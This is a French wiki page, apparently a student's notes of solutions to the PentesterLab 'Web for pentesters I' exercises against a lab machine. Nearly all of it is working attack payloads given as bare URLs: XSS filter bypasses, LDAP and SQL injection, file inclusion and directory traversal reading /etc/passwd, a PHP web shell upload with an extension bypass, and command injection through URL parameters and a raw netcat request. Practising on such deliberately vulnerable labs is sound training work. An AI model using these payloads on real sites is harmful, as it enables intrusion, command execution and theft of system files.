SecurInLille

Outils pour utilisateurs

Outils du site

Piste: pentesterlab_web
web:pentesterlab_web

Table des matières

https://www.pentesterlab.com/exercises/

Web for pentesters I

XSS

http://192.168.1.34/xss/example3.php?name=%3Cscrip%3Cscript%3Et%3Ealert(%27toto%27)%3C/%3Cscript%3Escrip%3C/script%3Et%3E

http://192.168.1.34/xss/example4.php?name=%3Cbutton%20onclick=%22alert(%27tg%27)%22%3Eclick%20me%20mofo%3C/button%3E

http://192.168.1.34/xss/example5.php?name=%3Cscript%3Eeval(%22blert(%27toto%27)%22.replace(%22b%22,%22a%22))%3C/script%3E

http://192.168.1.34/xss/example6.php?name=%22;alert(%27tg%27);//

http://192.168.1.34/xss/example7.php?name=%27;%20alert(%27tg%27);//

http://192.168.1.34/xss/example8.php/%22%3E%3Cscript%3E%20onclick=alert('toto')%3C/script%3E

http://192.168.1.34/xss/example9.php#<script>alert('toto')</script>

LDAP

http://192.168.1.34/ldap/example1.php

http://192.168.1.34/ldap/example2.php?name=a*))%00&password=bla

SQL Injections

http://192.168.1.34/sqli/example1.php?name=%27%20or%20%271%27=%271

http://192.168.1.34/sqli/example2.php?name=%27%09or%09%271%27=%271

http://192.168.1.34/sqli/example3.php?name=%27/**/or/**/%271%27=%271

http://192.168.1.34/sqli/example4.php?id=1%20OR%20id!=2

http://192.168.1.34/sqli/example5.php?id=2%20or%20id!=2

http://192.168.1.34/sqli/example6.php?id=2%20or%20id!=2#123

http://192.168.1.34/sqli/example7.php?id=2%0aor%20id!=2

http://192.168.1.34/sqli/example8.php?order=age`%20DESC%23

http://192.168.1.34/sqli/example9.php?order=IF(1,id,id)

File Include

http://192.168.1.34/fileincl/example1.php?page=http://www.google.fr
http://192.168.1.34/fileincl/example1.php?page=../../../../../../../etc/passwd
http://192.168.1.34/fileincl/example2.php?page=http://google.fr?foo=

File Upload

example1 : 
upload toto.html contenant "<script>alert('lol');</script>"
ou
upload tg.php contenant "<?php system($_GET["cmd"]);?>"

example2 : 
toto.html fonctionne toujours
tg.php est filtré, renommer en tg.php3

Commands Injection

http://192.168.1.34/commandexec/example1.php?ip=google.fr;cat%20/etc/passwd

http://192.168.1.34/commandexec/example2.php?ip=mustcontain%0a127.0.0.1%0als

echo "GET /commandexec/example3.php?ip=||ls;" | nc 192.168.1.34 80

Directory Traversal

http://192.168.1.34/dirtrav/example1.php?file=../../../../../../etc/passwd

http://192.168.1.34/dirtrav/example2.php?file=/var/www/files/../../../../etc/passwd

http://192.168.1.34/dirtrav/example3.php?file=../../../../../etc/passwd%00
web/pentesterlab_web.txt · Dernière modification: 2015/03/20 16:25 par x86

Outils de la page

Sauf mention contraire, le contenu de ce wiki est placé sous les termes de la licence suivante : CC Attribution-Share Alike 3.0 Unported
CC Attribution-Share Alike 3.0 Unported Donate Powered by PHP Valid HTML5 Valid CSS Driven by DokuWiki